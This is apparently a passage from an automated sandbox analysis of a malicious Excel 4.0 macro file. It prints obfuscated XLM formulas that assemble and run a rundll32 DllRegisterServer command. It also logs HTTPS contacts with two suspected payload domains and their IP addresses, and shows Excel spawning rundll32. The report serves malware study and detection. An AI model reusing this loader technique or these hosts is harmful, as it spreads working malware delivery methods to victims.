59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA.ARRAY(before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&before.3.5.0.sheet!BD2
                              "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                              "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)"=RUN(Doc3!AY22)

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 12, 2021 10:29:23.688659906 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:23.853526115 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:23.853696108 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:23.867039919 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:24.030771971 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:24.080914974 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:24.080960989 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:24.080982924 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:24.081001997 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:24.081203938 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:24.093775034 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:24.093931913 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:24.133903027 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:24.295335054 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:24.304227114 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:24.304316044 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:25.909770966 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:26.108259916 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:26.108406067 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:26.108448029 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:26.108522892 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:26.108968019 CEST49167443192.168.2.22108.167.180.164
                              May 12, 2021 10:29:26.270088911 CEST44349167108.167.180.164192.168.2.22
                              May 12, 2021 10:29:26.314234972 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:26.488869905 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:26.489123106 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:26.489830017 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:26.666759014 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:26.670870066 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:26.670898914 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:26.670914888 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:26.670943022 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:26.670964003 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:26.727654934 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:26.896027088 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:26.896203995 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:26.938097954 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:27.143203020 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:27.237899065 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:27.238106966 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:27.238198042 CEST44349170199.79.62.12192.168.2.22
                              May 12, 2021 10:29:27.238255978 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:27.238873005 CEST49170443192.168.2.22199.79.62.12
                              May 12, 2021 10:29:27.403459072 CEST44349170199.79.62.12192.168.2.22

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 12, 2021 10:29:23.492363930 CEST5219753192.168.2.228.8.8.8
                              May 12, 2021 10:29:23.672297955 CEST53521978.8.8.8192.168.2.22
                              May 12, 2021 10:29:24.628129005 CEST5309953192.168.2.228.8.8.8
                              May 12, 2021 10:29:24.677532911 CEST53530998.8.8.8192.168.2.22
                              May 12, 2021 10:29:24.685444117 CEST5283853192.168.2.228.8.8.8
                              May 12, 2021 10:29:24.736982107 CEST53528388.8.8.8192.168.2.22
                              May 12, 2021 10:29:25.298405886 CEST6120053192.168.2.228.8.8.8
                              May 12, 2021 10:29:25.347765923 CEST53612008.8.8.8192.168.2.22
                              May 12, 2021 10:29:25.355195999 CEST4954853192.168.2.228.8.8.8
                              May 12, 2021 10:29:25.425736904 CEST53495488.8.8.8192.168.2.22
                              May 12, 2021 10:29:26.132704020 CEST5562753192.168.2.228.8.8.8
                              May 12, 2021 10:29:26.312005043 CEST53556278.8.8.8192.168.2.22

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              May 12, 2021 10:29:23.492363930 CEST192.168.2.228.8.8.80xb648Standard query (0)iamihaveican.comA (IP address)IN (0x0001)
                              May 12, 2021 10:29:26.132704020 CEST192.168.2.228.8.8.80x5cbbStandard query (0)carriepatrick.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              May 12, 2021 10:29:23.672297955 CEST8.8.8.8192.168.2.220xb648No error (0)iamihaveican.com108.167.180.164A (IP address)IN (0x0001)
                              May 12, 2021 10:29:26.312005043 CEST8.8.8.8192.168.2.220x5cbbNo error (0)carriepatrick.com199.79.62.12A (IP address)IN (0x0001)

                              HTTPS Packets

                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                              May 12, 2021 10:29:24.093775034 CEST108.167.180.164443192.168.2.2249167CN=iamihaveican.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon May 10 21:15:17 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sun Aug 08 21:15:17 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                              CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                              CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                              May 12, 2021 10:29:26.670898914 CEST199.79.62.12443192.168.2.2249170CN=carriepatrick.theinspium.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Apr 09 15:50:56 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Thu Jul 08 15:50:56 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                              CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                              Code Manipulations

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Start time:10:29:40
                              Start date:12/05/2021
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                              Imagebase:0x13fd20000
                              File size:27641504 bytes
                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:10:29:48
                              Start date:12/05/2021
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32 ..\ikjcvesdv.ref,DllRegisterServer
                              Imagebase:0xff410000
                              File size:45568 bytes
                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:10:29:48
                              Start date:12/05/2021
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32 ..\ikjcvesdv.ref1,DllRegisterServer
                              Imagebase:0xff410000
                              File size:45568 bytes
                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Disassembly

                              Code Analysis

                              Reset < >